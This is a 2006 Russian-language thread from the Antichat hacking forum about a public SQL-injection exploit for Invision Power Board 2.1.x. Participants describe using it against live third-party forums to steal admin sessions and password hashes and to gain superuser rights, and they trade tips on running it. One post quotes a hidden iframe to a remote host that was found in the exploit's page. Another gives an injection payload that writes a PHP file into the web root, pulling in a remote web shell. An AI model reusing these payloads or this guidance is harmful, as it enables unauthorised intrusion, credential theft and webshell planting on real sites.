Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC (https://forum.antichat.xyz/showthread.php?t=21753)

InFiNiTy 14.07.2006 20:50

Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
 
Цитата:

## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
Как говорится ждем дефейсофф

Sn@k3 14.07.2006 21:38

во.крутая вещь.уже протестировал.вообще супер.

zeppe1in 17.07.2006 00:16

Код:

<div style="VISIBILITY: hidden"><iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe></div>
нах такое надо?

Rebz 17.07.2006 00:27

zeppe1in
+1

RST всегда отличались тем что любили счетчики на шеллы влепить или же ифреймик что собственно и наблюдаем=))

ZaCo 17.07.2006 00:31

шелл от рст дерьмо

s1z3r 17.07.2006 00:44

Тогда где шел от ZaCo???

ZaCo 17.07.2006 00:48

http://zaco.cup.su/uploads/SmWsHbZ.txt вообще он тоже дерьмовый но суть не в этом :D :D

CCHQ 17.07.2006 01:20

а вчом

K.e.H 17.07.2006 11:47

А как этот шел запускается .Что то он у меня не запускается

*Van* 17.07.2006 13:39

Интересную фишку я наблюдал при тестировании этого сплойта на forum.lineageii.ru. После первой проверки на уязвимость сразу же автоматически банят по ip.

Inferno 17.07.2006 13:53

Цитата:

Сообщение от *Van*
Интересную фишку я наблюдал при тестировании этого сплойта на forum.lineageii.ru. После первой проверки на уязвимость сразу же автоматически банят по ip.

lineageii.ru. достаточно серёзный проект и я недумаю что там настолько глупые админы чтоб не патчить свой форум!

madnet 17.07.2006 14:07

Поддерживая ZaCo, скажу что шелл RST действительно дерьмо, да и ребята там не очень хорошо поступают, воруя чужие идеи.

Inferno 17.07.2006 15:40

Цитата:

Сообщение от ForgetMeNot
Вы случаем не в курсе,что случилось с форумом diablozone.net?

А что с ним такого?-работает!!
И ты явно написал по теме..

ForgetMeNot 17.07.2006 15:49

Он не работал дня 2..просто узнать хотелось..может кто че знает

ForgetMeNot 17.07.2006 15:49

нет так нет=)

samurays 17.07.2006 17:15

Люди добрые, есть у кого нибудь реальный Exploit чтоб работал 100% на IPB 2.1.6?
Тот что здесь давали не работает там где мне надо :(

Inferno 17.07.2006 17:25

Цитата:

Сообщение от samurays
Люди добрые, есть у кого нибудь реальный Exploit чтоб работал 100% на IPB 2.1.6?
Тот что здесь давали не работает там где мне надо :(

Cплойт не может работать на 100% !!
Если форум патченный и нет не одного сплойта который будет канать!

Vilen 17.07.2006 17:30

- - -

Brahma 17.07.2006 18:10

Цитата:

Так что дырка сама автоматом заделалась ?
Ну почему-же - сама ? Админы помогли...

samurays 17.07.2006 18:12

Цитата:

Сообщение от Inferno
Cплойт не может работать на 100% !!
Если форум патченный и нет не одного сплойта который будет канать!

А есть у кого експлоит который бы работал на magic_quote=on?
нa IPB 2.1.6

Vilen 17.07.2006 21:09

- - -

Brahma 17.07.2006 21:43

Вполне возможно что твой аккаунт забанили, насколько я знаю - эксп. RST оставляет сообщение, благодаря которому и существует возможность sql inj. Попробуй создать другой аккаунт.
P.S. и действовать быстро.

Vilen 17.07.2006 23:32

- - -

Sn@k3 18.07.2006 00:33

Exploit для IPB работает нормально, я так уже стал сеперюзером на форуме

VampiRUS 18.07.2006 07:41

сразу извиняюсь, я ipb не очень знаком:(
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?

Sulf aka Joker 18.07.2006 07:48

А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.

Brahma 18.07.2006 22:55

Цитата:

сразу извиняюсь, я ipb не очень знаком
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
Советую открыть исходник, имхо.

VampiRUS 19.07.2006 05:26

Цитата:

Советую открыть исходник, имхо.
Исходник чего?форума? так как в exploite происходит только извлечение этого поля из бд.
Цитата:

А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
тогда я непонимаю логику создателей форума, для чего такое надо.
Цитата:

Maybe admin session not exist. Please try later.
в какой момент создается его сессия, когда он появляется на форуме? И только тогда можно получить его сессию?

zeppe1in 19.07.2006 12:23

По поводу сплойта
кто знает как выглядит Client_ip в хттп запросе?

Ponchik 28.07.2006 06:46

Хай всем!
Хочу залить шелл через IPB 2.1.5
Юзаю http://rst.void.ru/download/r57ipb216gui.txt хэш ворует, ссесию тоже, а вот нового админа не создаёт! И скоко я не смотрел сорс, ничё не понимаю! Пытался и руками куда-то в сплоит дописать как последний ламер
Код:

UNION INSERT INTO ibf_faq (id, title, text, description) VALUES(\'98\', \'shell\', \'<? require \\\"http://rst.void.ru/download/r57shell.txt\\\" ?>\', \'To hack this server\'); SELECT text INTO OUTFILE \'C:/AppServ/www/db.php\' FROM ibf_faq where id = \\\"98\\\";
Но он не создаёт такого файла (В C:/AppServ/www/ уверен, админ оставил phpinfo.php :) )
Кто поможет сакс хакеру залить шелл?

Driver 28.07.2006 08:37

Вручную заголовок подделай.
Там не трудно... а потом скуль запросом через админку подними себе права...
Вот мой 100% рабочий запрос, проверял на ИБП 2.1.6 просто подставь свои значения и выполни его...

короче вырезает форум мой запрос :( если что в асю стукнись - подскажу...

GET http://<your forum>/admin.php?adsess=<adsess_id>

Sharky 02.08.2006 02:09

кто нить а подскажите как сплойт этот запустить?

a1nt 02.08.2006 19:26

Цитата:

кто нить а подскажите как сплойт этот запустить?
perl C:/гдеонутебялежить/rst.pl
Разумеется перл нужно скачать.

Brahma 02.08.2006 19:30

exmpl:
Start -> Execute;
cmd;
C:\\path_to_perl\\perl.exe C:\\path_to_exploit\\exploit.pl

Driver 03.08.2006 17:47

Не ребят... так дело не пойдет...
Начну с того, что помочь вручную подделать заголовок я согласился только Пончику, а в асю поломилось пол ачата, ну это ладно, Бог с ним, хорошим людям помочь никогда не жалко, но ведь есть такие, которые пишут в асю, а на мой вопрос, что именно у тебя не получается пишут мне в ответ кучу матов и говорят, что я \"ничего\" не умею и помочь ничем не могу, ну и многое другое...
В общем все. От меня больше никто никогда не получит никакой помощи здесь. Люди не умеют быть благодарными, не ценят времени и помощи, их не волнует сколько времени человек продолбался над той или иной задачей, они считают его обязанностью помочь им, а для разнообразия в конце еще и обматерят. :(
Это просто не культурно. Просто не по человечески как то. Аж обидно стало. Ну да ладно... я все сказал.

Digimortal 06.09.2006 02:08

Цитата:

Сообщение от Vilen
Пацаны чо за херня - http://forum.lineageii.ru/
Писалось что форума уязвим - попытался вытащить cash пароль написало Lineageii.Ru
Потом опять тестил на уязвимость - уже пишет что форум не уязвим ...
Так что дырка сама автоматом заделалась ? :)
Самое прикольно автоматика сработала - захожу на сайт и вот что мне -
Забанен, хацкер. :)
Крутая защита - ничего сказать не могу ...

:) м-да, эти лайнеджевцы скоро за любую лишнюю кавычку в запросе банить начнут.. :)
А насчет сплоита: не понял нафиг этот графич. интерфейс? удобства он в использовании совсем не добавил.
Я когда етот сплоит испытывал, штук 20 сайтов пересмотрел пока мне не попался один уязвимый, и то сплоит работал наполовину. А так неплохой эксплоит, но, как и любой другой паблик сплоет, по большому счету бесполезный...

bandera 06.09.2006 08:48

Цитата:

Сообщение от Digimortal
:) м-да, эти лайнеджевцы скоро за любую лишнюю кавычку в запросе банить начнут.. :)
А насчет сплоита: не понял нафиг этот графич. интерфейс? удобства он в использовании совсем не добавил.
Я когда етот сплоит испытывал, штук 20 сайтов пересмотрел пока мне не попался один уязвимый, и то сплоит работал наполовину. А так неплохой эксплоит, но, как и любой другой паблик сплоет, по большому счету бесполезный...

Мля... Влепил бы тебе минусов, да не могу. За то, что темы давнишние поднимаешь да ещё и бессмысленными постами. В этом разделе третья вподряд.

З.Ы. А [Zarakul] наверное корефан твой раз тебе репутацию на таких постах подымает )

Digimortal 06.09.2006 10:09

Цитата:

Сообщение от bandera
Мля... Влепил бы тебе минусов, да не могу. За то, что темы давнишние поднимаешь да ещё и бессмысленными постами. В этом разделе третья вподряд.

З.Ы. А [Zarakul] наверное корефан твой раз тебе репутацию на таких постах подымает )

bandera, темы поднимаю я старые потому, что на их дату появления обычно и не смотрю. Если мне охота что-нить написать, я пишу, так что извеняй...

Zarakul'а я вообще не знаю. На циферку с моей репутацией я даже внимания не обращаю, так как мне эта репутация нафиг не нужна...

bandera 06.09.2006 11:25

Цитата:

Если мне охота что-нить написать, я пишу, так что извеняй...
Ёпт так пиши тогда в болталке, если так охота.

~Real F@ck!~ 12.09.2006 11:45

Зачем в ПМ? Сначала надо проверить уязвим ли форум. Затем если он уязвим надо ждать админа пока он прийдёт и залезет на форум, и тогда только ты его сессию спиздиш! А так пока админа на форуме нет жди и думай..... о чем нибудь.
И еще надо сначала нажать Get admin Session- потом увидиш или -Please later(что то типа такого)- или Попрёт все!


Время: 22:24